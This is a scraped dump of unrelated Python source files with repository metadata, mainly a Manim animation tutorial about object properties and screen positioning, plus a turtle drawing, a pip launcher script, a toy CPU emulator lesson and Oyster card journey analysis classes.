# print(b)
record = b'raymond   \x32\x12\x08\x01\x08'  # '<10sHHb' needs 15 bytes: a 10-byte name field plus H, H, b
name, serialnum, school, gradelevel = unpack('<10sHHb', record)
from collections import namedtuple
Student = namedtuple('Student', 'name serialnum school gradelevel')
b = Student._make(unpack('<10sHHb', record))
print(b)
b = pack('ci', b'*', 0x12131415)
print(b)
|
[
"xiaohua0877@sina.com"
] |
xiaohua0877@sina.com
|
bb48173d9cf8d2bfe7985c5298c639658b8b1863
|
d67261e0f768ffc729fa0002a693169549d94517
|
/projects/act/tutorial_manim/positions.py
|
623c2c5e0aa0196f2ea9ef71dd2bb2fa24931e51
|
[] |
no_license
|
gmile/Manim-TB
|
28da585df4e1bf68c48db66f2b9efd6e8cfe0290
|
89c1b69b4517499c52f808b764e26ae40ad690e5
|
refs/heads/master
| 2023-03-02T16:49:10.162667
| 2021-02-09T05:03:43
| 2021-02-09T05:03:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,110
|
py
|
from big_ol_pile_of_manim_imports import *
class OrientedObjectProgramming(Scene):
def construct(self):
        titulo=Texto("Object-Oriented Programming").to_edge(UP)
ul_titulo=underline(titulo)
objeto = Circle(color=RED)
t_objeto=Texto("\\it Object")
objeto.move_to(LEFT*objeto.get_width())
t_objeto.next_to(objeto,DOWN,buff=SMALL_BUFF*2)
centro_objeto=Dot()
centro_objeto.move_to(objeto.get_center())
punta_flecha=Dot().fade(1)
punta_flecha.move_to(centro_objeto.get_center()+objeto.get_width()*RIGHT/2)
punta_flecha.rotate(35*DEGREES,about_point=centro_objeto.get_center())
flecha=Flecha(centro_objeto,punta_flecha)
def update_flecha(flecha):
new_flecha=Flecha(centro_objeto,punta_flecha)
flecha.become(new_flecha)
propiedades=VGroup(
Texto("Properties:"),
Texto("1. Color"),
Texto("2. Radius"),
Texto("3. Stroke"),
Texto("4. Opacity"),
Formula("\\vdots")
).arrange_submobjects(DOWN,aligned_edge=LEFT).move_to(RIGHT*2)
propiedades[1:].shift(RIGHT*0.5)
propiedades[1].add_updater(lambda m: m.set_color(objeto.get_color()))
propiedades[3].add_updater(lambda m: m.set_stroke(None,objeto.get_stroke_width()*0.5-2))
propiedades[4].add_updater(lambda m: m.fade(1-objeto.get_stroke_opacity()))
igual=Formula("=").next_to(propiedades[2],RIGHT,buff=SMALL_BUFF*1.4)
decimal = DecimalNumber(
0,
show_ellipsis=False,
num_decimal_places=2,
include_sign=False,
).next_to(igual,RIGHT,buff=SMALL_BUFF*1.3)
decimal.add_updater(lambda d: d.set_value(objeto.get_width()/2))
self.play(Escribe(titulo),GrowFromCenter(ul_titulo))
self.play(ShowCreation(objeto),Escribe(t_objeto),FadeIn(centro_objeto),FadeIn(punta_flecha))
self.add_foreground_mobject(centro_objeto)
self.play(GrowArrow(flecha))
flecha.add_updater(update_flecha)
centro_objeto.add_updater(lambda m: m.move_to(objeto.get_center()))
punta_flecha.add_updater(
lambda m: m.move_to(centro_objeto.get_center()+objeto.get_width()*RIGHT/2)\
.rotate(35*DEGREES,about_point=centro_objeto.get_center())
)
t_objeto.add_updater(lambda m: m.next_to(objeto,DOWN,buff=SMALL_BUFF*2))
self.play(LaggedStart(FadeIn,propiedades))
self.wait()
self.play(ApplyMethod(objeto.set_color,YELLOW))
self.play(FadeIn(igual),FadeIn(decimal))
self.play(ApplyMethod(objeto.scale,2))
self.play(ApplyMethod(objeto.set_stroke,None,11))
self.play(ApplyMethod(objeto.set_stroke,None,None,0.2))
self.wait()
self.play(FadeOut(propiedades),FadeOut(centro_objeto),FadeOut(flecha),FadeOut(decimal),FadeOut(igual))
objeto2=objeto.copy().set_stroke(None,None,0)
self.play(objeto2.move_to,RIGHT*2,objeto2.scale,0.5,objeto2.set_stroke,BLUE,4,1)
t_objeto2=Texto("\\it Object 2").next_to(objeto2,DOWN,buff=SMALL_BUFF*1.3)
self.play(Escribe(t_objeto2))
self.wait()
self.play(*[FadeOut(obj)for obj in [objeto2,objeto,t_objeto2,t_objeto]])
cambio_propiedades=Formula("object.","function","(","parameters",")",alignment="\\tt")
cambio_propiedades[1].set_color(BLUE)
cambio_propiedades[-2].set_color(ORANGE)
cambio_propiedades.scale(2)
KeyBoard(self,cambio_propiedades[0])
KeyBoard(self,cambio_propiedades[1])
KeyBoard(self,cambio_propiedades[2])
KeyBoard(self,cambio_propiedades[3])
KeyBoard(self,cambio_propiedades[4])
self.wait()
class AbsolutePositions(Scene):
def construct(self):
t_to_edge=Texto("\\tt .to\\_edge()")
t_to_edge[1:-2].set_color(BLUE)
t_to_corner=Texto("\\tt .to\\_corner()")
t_to_corner[1:-2].set_color(BLUE)
t_move_to=Texto("\\tt .move\\_to()")
t_move_to[1:-2].set_color(BLUE)
t_next_to=Texto("\\tt .next\\_to()")
t_next_to[1:-2].set_color(BLUE)
t_shift=Texto("\\tt .shift()")
t_shift[1:-2].set_color(BLUE)
pos_abs=VGroup(t_to_edge,t_to_corner).arrange_submobjects(DOWN,aligned_edge=LEFT)
b_pos_abs=Brace(pos_abs,LEFT)
t_pos_abs=b_pos_abs.get_text("Absolute positions")
g_pos_abs=VGroup(pos_abs,b_pos_abs,t_pos_abs)
pos_rel=VGroup(t_move_to,t_next_to,t_shift).arrange_submobjects(DOWN,aligned_edge=LEFT)
b_pos_rel=Brace(pos_rel,LEFT)
t_pos_rel=b_pos_rel.get_text("Relative positions")
g_pos_rel=VGroup(pos_rel,b_pos_rel,t_pos_rel)
pos=VGroup(g_pos_abs,g_pos_rel).arrange_submobjects(DOWN,aligned_edge=LEFT)
b_pos=Brace(pos,LEFT)
t_pos=b_pos.get_text("Positions")
g_pos=VGroup(pos,b_pos,t_pos)
g_pos.move_to(ORIGIN)
objeto = Dot(color=RED).to_edge(UP)
obj_vista=VGroup()
self.play(Escribe(t_pos))
obj_vista.add(t_pos)
self.wait(2)
self.play(GrowFromCenter(b_pos))
obj_vista.add(b_pos)
self.wait(2)
self.play(Escribe(t_pos_abs),Escribe(t_pos_rel))
obj_vista.add(t_pos_abs,t_pos_rel)
self.wait(2)
self.play(FadeToColor(t_pos_abs,RED))
self.play(GrowFromCenter(objeto))
self.wait(2)
for d in [DOWN,LEFT,RIGHT]:
self.play(objeto.to_edge,d)
self.play(objeto.scale,0)
self.wait(2)
self.play(GrowFromCenter(b_pos_abs))
obj_vista.add(b_pos_abs)
KeyBoard(self,t_to_edge)
obj_vista.add(t_to_edge)
self.wait()
self.play(FadeOut(obj_vista))
def Codigo(texto):
texto_c=TikzMobject("""
\\begin{lstlisting}[language=Python,style=basic,numbers=none]
%s
\\end{lstlisting}
"""%texto).set_stroke(None,0).set_fill(WHITE,1)
return texto_c
direcciones = VGroup(*[Codigo("%s"%d)
for d in ["UP = np.array([ 0, 1,0])",
"DOWN = np.array([ 0,-1,0])",
"LEFT = np.array([-1, 0,0])",
"RIGHT = np.array([ 1, 0,0])"]],
).arrange_submobjects(DOWN,aligned_edge=LEFT)
num_in=[2,4,4,5]
for d,n in zip(direcciones,num_in):
d[n].set_color(ROSA_ST)
d[n+4:n+4+5].set_color(BLUE)
direcciones.move_to(ORIGIN)
self.play(LaggedStart(FadeIn,direcciones))
self.wait(2)
pos_to_edge=VGroup(*[Texto("\\tt .to\\_edge(%s)"%d)for d in ["UP","DOWN","LEFT","RIGHT"]]).scale(0.7)
puntos_to_edge=VGroup(*[Dot().to_edge(pos)for pos in [UP,DOWN,LEFT,RIGHT]]).set_color(RED)
for pos,p_te,d in zip(pos_to_edge,puntos_to_edge,[UP,DOWN,LEFT,RIGHT]):
pos[1:8].set_color(BLUE)
pos.next_to(p_te,-d,buff=SMALL_BUFF*1.3)
for obj1,obj2 in zip(puntos_to_edge,pos_to_edge):
self.play(LaggedStart(GrowFromCenter,obj1),LaggedStart(FadeIn,obj2))
self.wait(1.5)
self.play(FadeOut(pos_to_edge),FadeOut(puntos_to_edge),FadeOut(direcciones))
self.wait(2)
self.play(FadeIn(obj_vista))
KeyBoard(self,t_to_corner)
self.wait()
self.play(FadeOut(obj_vista),FadeOut(t_to_corner))
direcciones_mixtas = VGroup(*[Codigo("%s"%d)
for d in ["UR = np.array([ 1, 1,0])",
"UL = np.array([-1, 1,0])",
"DR = np.array([ 1,-1,0])",
"DL = np.array([-1,-1,0])"]]
).arrange_submobjects(DOWN,aligned_edge=LEFT)
direcciones_mixtas.move_to(ORIGIN)
num_in2=[2,2,2,2]
for d,n in zip(direcciones_mixtas,num_in2):
d[n].set_color(ROSA_ST)
d[n+4:n+4+5].set_color(BLUE)
self.play(LaggedStart(FadeIn,direcciones_mixtas))
pos_to_corner=VGroup(*[Texto("\\tt .to\\_corner(%s)"%d)for d in ["UR","UL","DR","DL"]])
puntos_to_corner=VGroup(*[Dot().to_edge(pos)for pos in [UR,UL,DR,DL]]).set_color(RED)
for pos,p_te,d in zip(pos_to_corner,puntos_to_corner,[UR,UL,DR,DL]):
pos[1:10].set_color(BLUE)
pos.next_to(p_te,-d,buff=SMALL_BUFF*1.3)
for obj1,obj2 in zip(puntos_to_corner,pos_to_corner):
self.play(LaggedStart(GrowFromCenter,obj1),LaggedStart(FadeIn,obj2))
self.wait(1.5)
self.wait(2)
self.play(FadeOut(pos_to_corner),FadeOut(puntos_to_corner),FadeOut(direcciones_mixtas))
punto_esquina=Dot().to_edge(LEFT,buff=-0.08)
punto_movimiento=Dot(color=YELLOW).scale(3).to_edge(LEFT,buff=1.5)
linea_mov=Line(punto_esquina.get_center(),punto_movimiento.get_left()).fade(1)
med=Medicion(linea_mov,dashed=True,buff=0.5).add_tips()
t_buff=Texto(r"\textit{\texttt{buff}}$=$").next_to(punto_movimiento,UR)
t_buff[:-1].set_color(ORANGE)
t_buff[-1].set_color(ROSA_ST)
decimal = DecimalNumber(
0,
show_ellipsis=False,
num_decimal_places=2,
include_sign=False,
).next_to(t_buff,RIGHT,buff=SMALL_BUFF*1.3)
decimal.add_updater(lambda m: m.set_value(linea_mov.get_length()).next_to(t_buff,RIGHT,buff=SMALL_BUFF*1.3))
self.play(
GrowFromCenter(med),
Escribe(VGroup(t_buff,decimal)),
GrowFromCenter(punto_movimiento)
)
self.add(linea_mov)
def update_med(med):
new_med=Medicion(linea_mov,dashed=True,buff=0.5).add_tips()
med.become(new_med)
def update_lin(linea_mov):
new_linea_mov=Line(punto_esquina.get_center(),punto_movimiento.get_left()).fade(1)
linea_mov.become(new_linea_mov)
linea_mov.add_updater(update_lin)
med.add_updater(update_med)
t_buff.add_updater(lambda m: m.next_to(punto_movimiento,UR))
self.play(punto_movimiento.shift,LEFT,run_time=5)
self.wait(2)
self.play(
*[FadeOut(obj)for obj in [decimal,t_buff,med,punto_movimiento]]
)
#'''
t_pos_abs.set_color(WHITE)
t_pos_rel.set_color(RED)
self.play(FadeIn(obj_vista),FadeIn(t_to_corner))
self.wait(2)
self.play(GrowFromCenter(b_pos_rel))
self.wait(2)
for obj in pos_rel:
KeyBoard(self,obj)
self.wait(2)
self.wait(2)
#self.play(GrowFromCenter(b_pos_abs))
#self.wait(2)
#'''
class Grid(VMobject):
CONFIG = {
"height": 6.0,
"width": 6.0,
}
def __init__(self, rows, columns, **kwargs):
digest_config(self, kwargs, locals())
VMobject.__init__(self, **kwargs)
def generate_points(self):
x_step = self.width / self.columns
y_step = self.height / self.rows
for x in np.arange(0, self.width + x_step, x_step):
self.add(Line(
[x - self.width / 2., -self.height / 2., 0],
[x - self.width / 2., self.height / 2., 0],
))
for y in np.arange(0, self.height + y_step, y_step):
self.add(Line(
[-self.width / 2., y - self.height / 2., 0],
[self.width / 2., y - self.height / 2., 0]
))
class ScreenGrid(VGroup):
CONFIG = {
"rows":8,
"columns":14,
"height": FRAME_Y_RADIUS*2,
"width": 14,
"grid_stroke":0.5,
"grid_color":WHITE,
"axis_color":RED,
"axis_stroke":2,
"show_points":False,
"point_radius":0,
"labels_scale":0.5,
"labels_buff":0,
"number_decimals":2,
"fade":0.5
}
def __init__(self,**kwargs):
VGroup.__init__(self,**kwargs)
rows=self.rows
columns=self.columns
grilla=Grid(width=self.width,height=self.height,rows=rows,columns=columns).set_stroke(self.grid_color,self.grid_stroke)
vector_ii=ORIGIN+np.array((-self.width/2,-self.height/2,0))
vector_id=ORIGIN+np.array((self.width/2,-self.height/2,0))
vector_si=ORIGIN+np.array((-self.width/2,self.height/2,0))
vector_sd=ORIGIN+np.array((self.width/2,self.height/2,0))
ejes_x=Line(LEFT*self.width/2,RIGHT*self.width/2)
ejes_y=Line(DOWN*self.height/2,UP*self.height/2)
ejes=VGroup(ejes_x,ejes_y).set_stroke(self.axis_color,self.axis_stroke)
divisiones_x=self.width/columns
divisiones_y=self.height/rows
direcciones_buff_x=[UP,DOWN]
direcciones_buff_y=[RIGHT,LEFT]
dd_buff=[direcciones_buff_x,direcciones_buff_y]
vectores_inicio_x=[vector_ii,vector_si]
vectores_inicio_y=[vector_si,vector_sd]
vectores_inicio=[vectores_inicio_x,vectores_inicio_y]
tam_buff=[0,0]
divisiones=[divisiones_x,divisiones_y]
orientaciones=[RIGHT,DOWN]
puntos=VGroup()
leyendas=VGroup()
for tipo,division,orientacion,coordenada,vi_c,d_buff in zip([columns,rows],divisiones,orientaciones,[0,1],vectores_inicio,dd_buff):
for i in range(1,tipo):
for v_i,direcciones_buff in zip(vi_c,d_buff):
ubicacion=v_i+orientacion*division*i
punto=Dot(ubicacion,radius=self.point_radius)
coord=round(punto.get_center()[coordenada],self.number_decimals)
leyenda=TextMobject("%s"%coord).scale(self.labels_scale).fade(self.fade)
leyenda.next_to(punto,direcciones_buff,buff=self.labels_buff)
puntos.add(punto)
leyendas.add(leyenda)
self.add(grilla,ejes,leyendas)
if self.show_points==True:
self.add(puntos)
class RelativePosition1(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
coord=Formula("(1,2)")
self.add(grilla)
self.wait()
self.play(GrowFromCenter(dot))
self.play(dot.move_to,RIGHT+UP*2)
coord.next_to(dot,RIGHT)
self.play(FadeIn(coord))
self.wait(3)
class RelativePosition2(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
text=Texto("Text").move_to(3*LEFT+2*UP)
dot.move_to(text)
self.add(grilla)
self.wait()
self.play(Escribe(text))
self.play(GrowFromCenter(dot))
self.wait()
self.play(dot.shift,RIGHT*5)
self.wait(7)
class RelativePositionMT(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
text=Texto("Text").move_to(3*LEFT+2*UP)
dot.move_to(text)
self.add(grilla)
self.wait()
self.play(Escribe(text))
self.play(GrowFromCenter(dot))
self.wait()
self.play(dot.shift,RIGHT*5)
self.wait()
linea=Line(text.get_center(),dot.get_center())
med=Medicion(linea,dashed=True).add_tips()
self.add(med)
class RelativePositionNT(Scene):
def construct(self):
grilla=ScreenGrid()
dot=Dot()
text=Texto("Text").move_to(3*LEFT+2*UP)
dot.next_to(text,RIGHT,buff=5)
self.add(grilla)
self.wait()
self.play(Escribe(text))
self.play(GrowFromCenter(dot))
self.wait()
linea=Line(text.get_right(),dot.get_left())
med=Medicion(linea,dashed=True).add_tips()
self.add(med)
class RotateP(Scene):
def construct(self):
grid=ScreenGrid()
cod=Formula("\\tt object.","rotate","(","110*DEGREES,","\\mbox{\\textit{\\texttt{about\\_point}}}","=","point",")")
cod[1].set_color(BLUE)
cod[4].set_color(ORANGE)
cod[5].set_color(ROSA_ST)
dot1=Dot().shift(UP)
dot2=Dot().move_to(1*DOWN)
t_dot1=TextMobject("\\tt dot1").next_to(dot1,DOWN+LEFT,buff=SMALL_BUFF)
t_dot2=TextMobject("\\tt dot2").next_to(dot2,DOWN+LEFT,buff=SMALL_BUFF)
        remark=TextMobject("\\texttt{point} is a coord, not an object.").to_edge(UP)
cod.to_edge(DOWN)
self.add(grid)
self.play(GrowFromCenter(dot1),Escribe(t_dot1))
self.play(GrowFromCenter(dot2),Escribe(t_dot2))
t_dot2.add_updater(lambda m: m.next_to(dot2,DOWN+LEFT,buff=SMALL_BUFF))
self.play(Write(cod))
arc=Arc(110*DEGREES,radius=2,arc_center=dot1.get_center(),start_angle=-90*DEGREES)
self.play(Rotate(dot2,110*DEGREES,about_point=dot1.get_center()),ShowCreation(arc))
self.play(Write(remark))
self.wait()
class FormulasLatex(Scene):
def construct(self):
for1=Formula(r"\int_a^b f(x)dx")
for2=Formula(r"\lim_{x\to\infty}\frac{1}{x}=0")
for3=Formula(r"\frac{d}{dx}f(x)=\lim_{h\to 0}\frac{f(x+h)-f(x)}{h}")
for4=Formula(r"e^{\pi i}+1=0")
for5=Formula(r"\rho\frac{D{\bf u}}{Dt}=-\nabla p + \nabla\cdot\tau + \rho{\bf g}")
form=VGroup(
for1,
for2,
for3,
for4,
).set_color_by_gradient(PURPLE,ORANGE,BLUE)
for obj,pos in zip(form,[UR,UL,DR,DL]):
obj.to_corner(pos)
self.play(*[Escribe(obj)for obj in form], Escribe(for5))
self.wait(4)
class MoveToScene(Scene):
def construct(self):
grid=ScreenGrid()
self.add(grid)
move_to_center=Formula("\\tt .move\\_to(","vector)")
move_to_center[0][1:-1].set_color(BLUE)
move_to_object=Formula("\\tt .move\\_to(","reference\\_object.","get\\_center","()+vector)")
move_to_object[0][1:-1].set_color(BLUE)
move_to_object[2].set_color(BLUE)
t_move_to=VGroup(move_to_center,move_to_object).arrange_submobjects(DOWN,aligned_edge=LEFT)
t_move_to.to_corner(DL)
rec=Rectangle(width=t_move_to.get_width(),height=t_move_to.get_height()).move_to(t_move_to)\
.set_stroke(None,0,0).set_fill(BLACK,0.8)
punto=Dot()
cuadro=Square(fill_opacity=1).match_width(punto).set_color(YELLOW)
flecha=VFlecha(ORIGIN,2*UP+3*RIGHT).set_color(PURPLE)
t_flecha=TextMobject("\\tt vector")
self.play(GrowFromCenter(punto))
self.wait(2)
self.play(FadeIn(rec))
KeyBoard(self,move_to_center[0])
KeyBoard(self,move_to_center[1])
self.wait(3)
self.add_foreground_mobject(punto)
self.play(punto.move_to,2*UP+3*RIGHT,GrowArrow(flecha))
self.wait(3)
t_flecha.next_to(flecha,DOWN,buff=0.2)
self.play(ReplacementTransform(flecha[0].copy(),t_flecha))
self.wait(3)
KeyBoard(self,move_to_object[0])
KeyBoard(self,move_to_object[1])
KeyBoard(self,move_to_object[2])
KeyBoard(self,move_to_object[3])
cuadro.move_to(DOWN+LEFT*2)
flecha_cuadro=VFlecha(cuadro.get_center(),cuadro.get_center()+3*UP+LEFT).set_color(PURPLE)
self.play(ReplacementTransform(move_to_object[1].copy(),cuadro))
self.wait(2)
self.add_foreground_mobject(cuadro)
self.play(ReplacementTransform(flecha,flecha_cuadro),punto.move_to,cuadro.get_center()+3*UP+LEFT,
t_flecha.next_to,flecha_cuadro,DOWN,{"buff":0.2})
self.wait(2)
|
[
"davz95@hotmail.com"
] |
davz95@hotmail.com
|
45269fe78e3d719ac99c24d5bc4cd93dfa49ca21
|
51ede9626838cc3131e41c1a4681ff8d8af8e45f
|
/session4/Turtle/triangle.py
|
d2cdcf458ffe31173e8ccd1a764008eddfde4531
|
[] |
no_license
|
longngo2002/C4TB
|
2d0431949df714d5df8a22ab6b5716dd68c71fa8
|
191c6ad4fb2051d15d8330ef6d021f03c12ce41c
|
refs/heads/master
| 2020-06-16T10:06:14.915265
| 2019-08-24T07:44:36
| 2019-08-24T07:44:36
| 195,533,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
from turtle import *
color("green")
fillcolor("yellow")
begin_fill()
forward(200)
left(120)
forward(200)
left(120)
forward(200)
end_fill()
mainloop()
|
[
"vipcom247@gmail.com"
] |
vipcom247@gmail.com
|
7cc6891cf33ed38c1f157f9bdd0c84d53b7b6401
|
dc9b0ea6714c29651cfd8b494862f31f07d85f28
|
/project9/venv/Scripts/pip3-script.py
|
b6b74138b57b60b38ead8ed47e96d33a675b322b
|
[] |
no_license
|
Papashanskiy/PythonProjects
|
c228269f0aef1677758cb6e2f1acdfa522da0a02
|
cf999867befa7d8213b2b6675b723f2b9f392fd7
|
refs/heads/master
| 2022-12-12T15:23:56.234339
| 2019-02-10T09:14:56
| 2019-02-10T09:14:56
| 148,336,536
| 0
| 0
| null | 2022-12-08T03:01:04
| 2018-09-11T15:10:44
|
Python
|
WINDOWS-1251
|
Python
| false
| false
| 436
|
py
|
#!C:\Users\Игорь\Desktop\Python\PythonProjects\project9\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
|
[
"apashanskiy@gmail.com"
] |
apashanskiy@gmail.com
|
e29d1c1cb5e95478cad566d18766a86d828dc9db
|
71defe8f65d87d9d5ca8af3176f58ef5052beeec
|
/Dynamic-Class-Calling-04-01-20/SO_dynamic_class_call.py
|
6416944886fd44ba0e87e87515f33daf5fa356a2
|
[] |
no_license
|
vw-liane/SO_CR_Questions
|
2dbea04c382a0626d3957c36e9596c2797286545
|
226d5dff3a822ad2e79672083bfe2c15c6a81afe
|
refs/heads/master
| 2021-05-20T13:38:51.335877
| 2020-04-07T20:51:39
| 2020-04-07T20:51:39
| 252,318,802
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,322
|
py
|
from pathlib import Path
import pandas as pd
import inspect
## SUPER CLASSES
################
class Fruit(object):
def __init__(self):
self.name = "fruit"
def __str__(self):
return f"{self.name} object"
class Vegetable(object):
def __init__(self):
self.name = "vegetable"
def __str__(self):
return f"{self.name} object"
## SUB CLASSES
##############
class Grape(Fruit):
def __init__(self):
self.name = "grape"
def __str__(self):
return f"{self.name} object"
class Cucumber(Vegetable):
def __init__(self):
self.name = "cucumber"
def __str__(self):
return f"{self.name} object"
def extract_ser():
sub_cls_ser = {} # holds the series of grapes -or- cucumbers
classes_path = Path('Classes') # starting folder
for super_class in classes_path.iterdir(): # Path of Fruit -or- Vegetable Folder
for sub_class in super_class.iterdir(): # Path of <grapes.csv> -or- <cucumbers.csv>
df_csv = pd.read_csv(sub_class) # dataframe assignment
df_ser = df_csv.iloc[:,0] # series assignment
sub_cls_ser[eval((sub_class.stem[:-1]).capitalize())] = df_ser # [ClassName] = series
return sub_cls_ser
def make_objs(sub_ser):
for cls_key, ser_val in sub_ser.items():
        make_cls = lambda _: cls_key()  # ignore the cell value and just instantiate the class
        print(f"Check DF obj_key: {cls_key} \n Type: {type(cls_key)}")
        obj_df = ser_val.apply(make_cls) # is safer because only using in .apply()?
print(f"After .apply()::\nCheck OBJ_DF Contents\n{obj_df}\n")
## RECURSIVE THROUGH TREE
def trav_tree(tree):
for indx, elem in enumerate(tree):
for jdx, sub in enumerate(elem):
print(f"Index: {jdx}\nSub-Elem: {sub}\n\n")
if __name__ == "__main__":
sub_cls_series = extract_ser()
make_objs(sub_cls_series)
cls_list = [Vegetable, Fruit, Grape, Cucumber]
the_tree = inspect.getclasstree(classes=cls_list)
trav_tree(the_tree)
my_fab_cuc = Cucumber()
print(f"Is my_fab_cuc an instance of Vegetable?: {isinstance(my_fab_cuc, Vegetable)}")
print(f"Is my_fab_cuc an instance of Cucumber?: {isinstance(my_fab_cuc, Cucumber)}")
|
[
"noreply@github.com"
] |
vw-liane.noreply@github.com
|
c23b662a550c30d7a3cb726d20f1668874730de4
|
c770679730937a2dc3e9ec62d721c2782b44e6d0
|
/lesson/beej.py
|
98e870a4b13ee7fd0cd21ff1d9e9a2d9b4e5bf19
|
[] |
no_license
|
Lambda-CS/Computer-Architecture
|
6156d9fef458183de5918c54f910e47e2b80d4e7
|
947b28fd319c074313b0b0a0c5df26bbb91c9f32
|
refs/heads/master
| 2022-11-20T17:35:21.651380
| 2020-07-26T02:10:38
| 2020-07-26T02:10:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,285
|
py
|
"""
CPU
Executing instructions
Gets them out of RAM
Registers (like variables)
Fixed names R0-R7
Fixed number of them -- 8 of them
Fixed size -- 8 bits
Memory (RAM)
A big array of bytes
Each memory slot has an index, and a value stored at that index
That index into memory AKA:
pointer
location
address
"""
memory = [
1, # PRINT_BEEJ
1, # PRINT_BEEJ
1, # PRINT_BEEJ
    3, # SAVE_REG R2,64 register to save in, the value to save there
2, # R2
64, # 64
4, # PRINT_REG R2
2, # R2
2, # HALT <-- pc
]
register = [0] * 8
pc = 0 # Program Counter, index into memory of the current instruction
# AKA a pointer to the current instruction
running = True
while running:
inst = memory[pc]
if inst == 1: # PRINT_BEEJ
print("Beej")
pc += 1
elif inst == 2: # HALT
running = False
elif inst == 3: # SAVE_REG
reg_num = memory[pc + 1]
value = memory[pc + 2]
register[reg_num] = value
pc += 3
elif inst == 4: # PRINT_REG
reg_num = memory[pc + 1]
print(register[reg_num])
pc += 2
else:
print(f"Unknown instruction {inst}")
|
[
"antonyk@users.noreply.github.com"
] |
antonyk@users.noreply.github.com
|
29d796e42ac5d264ce6c00a8cbc9464e9d67014d
|
3e46efd609c829ec3c45fab7b11daa2ddcae45f2
|
/thathweb/production.py
|
f263cdf69a7ada42e25f1c4218f62908d536d165
|
[] |
no_license
|
travishathaway/thathweb
|
2b0f1c2f4941082d66b7633ae0686382335471d9
|
9f0ef221cdeef3a6b0240488fe10bc6d11371280
|
refs/heads/master
| 2020-04-18T05:27:03.172744
| 2014-08-03T19:03:27
| 2014-08-03T19:03:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 71
|
py
|
from thathweb.settings import *
DEBUG = False
TEMPLATE_DEBUG = False
|
[
"travis.j.hathaway@gmail.com"
] |
travis.j.hathaway@gmail.com
|
5f0f59332ec2a54a6ae41d1a6ec0b45e70055095
|
87b9cd8a7c94f4a52e2fa608aa4fa7904e8d5fbb
|
/oyster/journey_analyser.py
|
e6cc302fe876fbc947d21a4b4ffdd9559923bc73
|
[] |
no_license
|
chbatey/oystergrep
|
87b9b5c76f6a3a96b71e31a7f19f71f0419e5ba6
|
886e1aec3d786bd51f485816aa0e07241d9fcccf
|
refs/heads/master
| 2016-09-11T03:52:00.434354
| 2013-06-23T20:00:21
| 2013-06-23T20:00:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,036
|
py
|
import logging
import calendar
class JourneyAnalyser:
def analyse_journeys(self, journeys):
total_cost = 0
journeys_by_month = {}
for journey in journeys:
total_cost += journey.cost
month = journey.date.month
logging.debug("Month %s" % month)
if month not in journeys_by_month:
journeys_by_month[month] = []
journeys_by_month[month].append(journey)
return JourneyAnalysis(total_cost, journeys_by_month)
class JourneyAnalysis:
def __init__(self, total_cost, journeys_by_month):
self.total_cost = total_cost
self.journeys_by_month = journeys_by_month
def get_total_cost(self):
return self.total_cost
def get_month_breakdown(self, month):
if month in self.journeys_by_month:
return MonthBreakDown(self.journeys_by_month[month], month)
else:
return MonthBreakDown([], month)
class MonthBreakDown:
    def __init__(self, journeys, month):
        self._journeys = journeys
        self._month = month
def get_total_cost(self):
total = 0.0
for journey in self._journeys:
total += journey.cost
return total
def get_journeys(self):
return self._journeys
def get_week_breakdown(self):
weeks = self.get_weeks(2013, self._month)
for week in weeks:
week._add_journeys(self._journeys)
return weeks
def get_weeks(self, year, month):
cal = calendar.Calendar()
iterator = cal.itermonthdates(year, month)
day_of_week = 0
weeks = []
current_week = []
for date in iterator:
day_of_week += 1
if date.month == month:
current_week.append(date)
if day_of_week == 7:
weeks.append(WeekBreakdown(current_week[0], current_week[-1]))
day_of_week = 0
current_week = []
return weeks
class WeekBreakdown:
def __init__(self, start_date, end_date):
self._end_date = end_date
self._start_date = start_date
self._journeys = []
def get_start_date(self):
return self._start_date
def get_end_date(self):
return self._end_date
def _add_journeys(self, journeys):
for journey in journeys:
if self._start_date <= journey.date.date() <= self._end_date:
self._journeys.append(journey)
def get_journeys(self):
return self._journeys
def get_summary(self):
to_return = "Week: " + str(self._start_date) + " to " + str(self._end_date) + " " + str(self.get_total_cost()) + "\n"
for journey in self._journeys:
to_return += str(journey.date) + " " + str(journey.cost) + " " + journey.description + "\n"
return to_return
def get_total_cost(self):
total = 0.0
for journey in self._journeys:
total += journey.cost
return total
|
[
"christopher.batey@gmail.com"
] |
christopher.batey@gmail.com
|
f035a5e710ff8c6c6c19a8887f9b5988f0cf5cc1
|
c642371b301168af9130c33564566513681af824
|
/leetcode/leetcode108.py
|
35a9037c7ea3d3ecd314a4b6e4c3e64954e9cb8b
|
[] |
no_license
|
fucct/Algorithm-python
|
974aed1b4538397ff40f1da243596c0a05eacaa5
|
fce6ae44df3a4985011850fe85d99d28f7f7b53f
|
refs/heads/master
| 2022-12-12T15:16:46.982614
| 2020-09-07T13:19:09
| 2020-09-07T13:19:09
| 291,237,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
from typing import List
from leetcode.leetcode100 import TreeNode
class Solution:
def sortedArrayToBST(self, nums: List[int]) -> TreeNode:
if not nums:
return
mid = len(nums) // 2
root = TreeNode(nums[mid])
root.left = self.sortedArrayToBST(nums[0:mid])
root.right = self.sortedArrayToBST(nums[mid+1:])
return root
|
[
"dqrd123@gmail.com"
] |
dqrd123@gmail.com
|
e583114fef71a6d19de920b44c44188a46dc0fa3
|
396787df1b472ddfab7d934c149b150352342f03
|
/python_server/app/venv/lib/python3.6/abc.py
|
f8e195b4163e5b20c50a27852d19d733e39f6d31
|
[] |
no_license
|
Deanwinger/python_project
|
a47b50a9dfc88853a5557da090b0a2ac3f3ce191
|
8c0c2a8bcd51825e6902e4d03dabbaf6f303ba83
